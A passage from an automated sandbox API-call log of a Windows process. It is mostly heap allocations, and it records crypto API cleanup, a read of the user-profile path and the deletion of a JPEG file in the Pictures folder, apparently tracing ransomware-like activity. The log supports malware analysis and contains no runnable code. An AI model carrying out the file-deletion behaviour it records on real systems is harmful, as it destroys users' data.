dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0253.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0253.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0253.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0253.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0253.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0253.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0253.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0253.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0253.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0253.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0253.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0253.078] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0253.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0253.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0253.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0253.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0253.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0253.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0253.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0253.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0253.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0253.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0253.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0253.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0253.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0253.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0253.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0253.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0253.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0253.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0253.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0253.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0253.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0253.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0253.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0253.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0253.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0253.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0253.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0253.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0253.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0253.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0253.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0253.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0253.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0253.080] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0253.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0253.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0253.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0253.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0253.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0253.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0253.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0253.080] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0253.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0253.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51430 [0253.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0253.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0253.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0253.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0253.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0253.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0253.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0253.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0253.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0253.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0253.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0253.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0253.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0253.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0253.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0253.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0253.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0253.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0253.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0253.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0253.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0253.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0253.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0253.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0253.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0253.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0253.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0253.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0253.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0253.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0253.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0253.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0253.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0253.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0253.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0253.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0253.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0253.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0253.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0253.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0253.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0253.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0253.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0253.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0253.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0253.082] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0253.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0253.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0253.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0253.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0253.082] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0253.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0253.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0253.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514c0 [0253.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0253.082] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0253.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0253.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0253.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0253.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0253.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0253.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0253.083] FreeLibrary (hLibModule=0x756e0000) returned 1 [0253.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0253.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0253.083] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0253.083] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0253.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0253.083] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0253.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0253.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0253.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0253.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0253.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0253.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0253.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0253.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0253.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51358 [0253.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51430 [0253.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51340 [0253.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0253.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51598 [0253.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0253.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0253.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0253.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0253.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0253.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0253.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0253.084] CloseHandle (hObject=0x2a0) returned 1 [0253.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0253.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0253.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0253.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0253.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0253.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0253.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0253.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0253.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0253.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0253.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0253.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0253.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0253.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0253.085] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0253.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0253.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0253.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0253.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0253.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0253.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0253.086] CloseHandle (hObject=0x2d0) returned 1 [0253.092] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0253.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0253.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0253.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0253.093] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0253.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0253.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0253.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0253.093] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0253.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0253.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0253.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0253.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0253.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0253.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0253.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0253.094] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/SWfcb.jpg", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\SWfcb.jpg", lpFilePart=0x8cedf4*="SWfcb.jpg") returned 0x22 [0253.094] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\SWfcb.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\swfcb.jpg")) returned 0x20 [0253.094] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\SWfcb.jpg", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0d8da40, ftCreationTime.dwHighDateTime=0x1d5eaf2, ftLastAccessTime.dwLowDateTime=0xa8a18d0, ftLastAccessTime.dwHighDateTime=0x1d5e37c, ftLastWriteTime.dwLowDateTime=0xa8a18d0, ftLastWriteTime.dwHighDateTime=0x1d5e37c, nFileSizeHigh=0x0, nFileSizeLow=0x14f18, dwReserved0=0x1, dwReserved1=0x1c, cFileName="SWfcb.jpg", cAlternateFileName="")) returned 0xa86f90 [0253.094] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\SWfcb.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\swfcb.jpg")) returned 1 [0253.262] FindNextFileW (in: hFindFile=0xa86f90, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0d8da40, ftCreationTime.dwHighDateTime=0x1d5eaf2, ftLastAccessTime.dwLowDateTime=0xa8a18d0, ftLastAccessTime.dwHighDateTime=0x1d5e37c, ftLastWriteTime.dwLowDateTime=0xa8a18d0, ftLastWriteTime.dwHighDateTime=0x1d5e37c, nFileSizeHigh=0x0, nFileSizeLow=0x14f18, dwReserved0=0x1, dwReserved1=0x1c, cFileName="SWfcb.jpg", cAlternateFileName="")) returned 0 [0253.262] FindClose (in: hFindFile=0xa86f90 | out: hFindFile=0xa86f90) returned 1 [0253.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0253.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0253.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0253.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0253.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0253.263] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0253.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0253.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0253.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0253.263] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0253.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0253.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0253.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0253.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0253.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0253.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0253.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0253.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0253.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0253.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0253.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0253.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0253.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0253.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0253.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0253.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0253.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0253.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0253.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0253.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0253.264] 